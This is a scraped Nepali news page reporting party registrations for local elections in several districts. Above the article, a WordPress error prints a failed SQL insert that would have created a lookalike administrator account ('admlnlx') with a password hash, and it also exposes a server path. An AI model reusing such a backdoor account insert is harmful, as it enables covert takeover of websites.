WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BeTC/fJMjJ/jzDHtdxqkB/tJj2xXhu.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-16 15:19:42', '', 'admlnlx', 'admlnlx')


Warning: Trying to access array offset on value of type bool in /home/gaulekhabar.com/public_html/wp-content/themes/nepali-news-portal/header.php on line 21
विभिन्न जिल्लामा दल दर्ता – Gaule Khabar

विभिन्न जिल्लामा दल दर्ता

विभिन्न जिल्लामा दल दर्ता

काठमाडौँ,माघ २० –

सरकारले स्थानीय निर्वाचनको मिति घोषणा गर्ने तयारी गरिरहेका बेला विभिन्न जिल्लामा दल दर्ता गराएका छन् ।

इलाम : इलाममा १७ वटा पार्टीले जिल्ला निर्वाचन कार्यालयमा दल दर्ता गर्ने अन्तिम दिन अर्थात् माघ १७ गतेसम्म १७ वटा पार्टीले दल दर्ता गराएका छन् ।

नेपाली काँग्रेस, नेकपा (माले), नेकपा (माओवादी केन्द्र), राष्ट्रिय प्रजातन्त्र पार्टी, नयाँशक्ति पार्टी, सङ्घीय लोकतान्त्रिक राष्ट्रिय मञ्च, सङ्घीय समाजवादी फोरम नेपाल, जनप्रजातान्त्रिक पार्टी नेपाल, राष्ट्रिय जनमुक्ति पार्टी, खम्बुवान् राष्ट्रिय पार्टी, मधेसी जनाधिकार फोरम नेपाल लोकतान्त्रिक, मङ्गोल नेसनल अर्गनाइजेसन, नेपाल कम्युनिष्ट पार्टी माले (जनसमाजवादी), नेपाल पूर्वराष्ट्रसेवक लोकतान्त्रिक पार्टी, युनाइटेड ग्रिन अर्गनाइजेसन, नेकपा (माक्र्सवादी लेनिनवादी), नेपाल कम्प्युनिष्ट पार्टी निर्वाचन कार्यालयमा दर्ता भएका हुन् ।

स्थानीय निर्वाचनको चर्चा चलिरहेका बेला जिल्लामा नयाँशक्ति पार्टी नेपाल, युनाइटेड ग्रिन अर्गनाइजेसन, नेपाल पूर्वराष्ट्रसेवक लोकतान्त्रिक पार्टी नयाँ पार्टीका रूपमा दल दर्ता भएको जिल्ला निर्वाचन कार्यालयका प्रमुख प्रेम काफ्लेले जानकारी दिनुभयो ।

जुम्ला : स्थानीय तहको निर्वाचनमा सहभागी हुनका लागि जुम्लामा क्रियाशील १४ दलले जिल्ला निर्वाचन कार्यालय जुम्लामा विवरण अद्यावधिक गराएका छन् ।

निर्वाचन आयोग नेपालले जारी गरेको सूचनाबमोजिम फारम भरिआएका दलको विवरण अद्यावधिक गरिएको जिल्ला निर्वाचन अधिकारी खुमप्रसाद सुवेदीले जानकारी दिनुभयो । विवरण अद्यावधिक गर्ने दलमा नेपाल मजदुर किसान पार्टी, नेपाली काँग्रेस, नेकपा (माओवादी केन्द्र), नेकपा (एमाले), नेकपा (माले), राष्ट्रिय प्रजातन्त्र पार्टी, राष्ट्रिय जनमोर्चा पार्टी, सङ्घीय समाजवादी फोरम, नयाँ शक्ति पार्टी, मधेसी जनअधिकार फोरम नेपाल, तराई मधेस लोकतान्त्रिक पार्टी, देशभक्त समाजवादी पार्टी, नेपाल पूर्वराष्ट्रसेवक लोकतान्त्रिक पार्टी र राष्ट्रिय जनमुक्ति पार्टी रहेको जिल्ला निर्वाचन अधिकारी सुवेदीले बताउनुभयो ।

निर्वाचन आयोगले दिएको अन्तिम मिति यही माघ १७ गतेसम्म भएको र सोही मितिको परिधिभित्र विधि प्रक्रिया पु¥याएर आएका दलको विवरण अद्यावधिक गरिएको जिल्ला निर्वाचन कार्यालय जुम्लाले जनाएको छ । सुवेदीका अनुसार जुम्लामा नेकपा ९क्रान्तिकारी माओवादी० र नेत्रविक्रम चन्द विप्लव समूहको नेकपा माओवादी पार्टीले भने विवरण अद्यावधिक गराएका छैनन् ।

रोल्पाः आसन्न स्थानीय निर्वाचन प्रयोजनार्थ रोल्पामा ११ वटा राजनीतिक दल दर्ता भएका छन । दल दर्ताका लागि दलले जिल्ला निर्वाचन कार्यालयमा पठाएको पत्रका आधारमा पहिलो नम्बरमा नेपाल कम्युनिष्ट पार्टी ९एमाले० दर्ता भएको छ ।

यसैगरी, दर्ता हुने अन्य राजनीतिक दलमा सङ्घीय समाजवादी फोरम नेपाल, नेपाल परिवार दल, राष्ट्रिय प्रजातन्त्र पार्टी, नेपाली काँग्रेस, नेपाल मजदुर किसान पार्टी, नेपाल पूर्वराष्ट्रसेवक लोकतान्त्रिक पार्टी, नेपाल कम्युनिष्ट पार्टी (माओवादी केन्द्र), नेकपा (माले), नयाँ शक्ति नेपाल पार्टी र राष्ट्रिय जनमोर्चा रहेको जिल्ला निर्वाचन अधिकारी गिरीराज ज्ञवालीले जानकारी दिनुभयो ।

स्थानीय निर्वाचनका लागि निर्वाचन आयोगले गत माघ १७ गतेसम्म दिएको म्यादअनुसार जिल्लामा यी दल दर्ता भएको ज्ञवालीले जानकारी दिनुभयो । दल दर्ताका लागि जिल्लामा म्याद सकिएको भएपनि पुनः निवेदन आए आयोगमा दर्ता गर्न जिल्लावाट सिफारिस गर्न सकिने बताइएको छ । जिल्लामा दर्ता रहेका ११ दलमध्ये नेपाल पूर्वराष्ट्रसेवक लोकतान्त्रिक पार्टी र नयाँ शक्ति नेपाल पार्टी नयाँ भएपनि अन्य नौ दल भने यसअघिको संविधान सभा निर्वाचनमा सहभागिता जनाएका दल हुन् ।

बाजुरा : स्थानीय निर्वाचनका लागि सहभागी हुन र तयारी गर्नका लागी बाजुरामा राजनीतिक दल जिल्ला निर्वाचन कार्यालय बाजुरामा विवरण पेस गरी दल दर्ता गराएका छन् ।

निर्वाचन आयोगले सोमवार अर्थात् माघ १७ गतेसम्ममा सबै राजनीतिक दलको विवरण पेस गर्नुपर्ने निर्देशनअनुसार बाजुरामा अन्तिम दिनसम्म नौ राजनीतिक दलले पार्टीको विवरण बुझाएको जिल्ला निर्वाचन कार्यालय, बाजुराका निमित्त जिल्ला निर्वाचन अधिकारी मानबहादुर थापाले राससलाई जानकारी दिनुभयो ।

पार्टीको विवरण बुझाएर दर्ता भएका दलमा नेपाली काँग्रेस, नेकपा (एमाले), नेकपा (माओवादी केन्द्र), राष्ट्रिय प्रजातन्त्र पार्टी, नेकपा जनसमाजवादी (माले), राष्ट्रिय जनमोर्चा नेपाल, नयाँशक्ति पार्टी नेपाल, पूर्वराष्ट्रसेवक लोकतान्त्रिक पार्टी रहेका छन् । जिल्लामा रहेका क्रियाशील पार्टीले विवरण बुझाएर आधिकारिक रुपमा दर्ता गरेको निमित्त जिल्ला निर्वाचन अधिकारी थापाले बताउनुभयो ।

बाजुरामा नयाँ शक्ति नेपाल, राष्ट्रसेवक लोकतान्त्रिक पार्टी नयाँ पार्टीका रुपमा दर्ता भएका जिल्ला निर्वाचन कार्यालयका कम्प्युटर अपरेटर दुर्गा थापाले बताउनुभयो । उहाँले दोस्रो संविधान सभाको चुनावमा भाग लिनका लागि जिल्ला निर्वाचन कार्यालयमा स्वतन्त्र पार्टीसहित १४ दल दर्ता भएको थापाको भनाइ रहेको छ । – रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका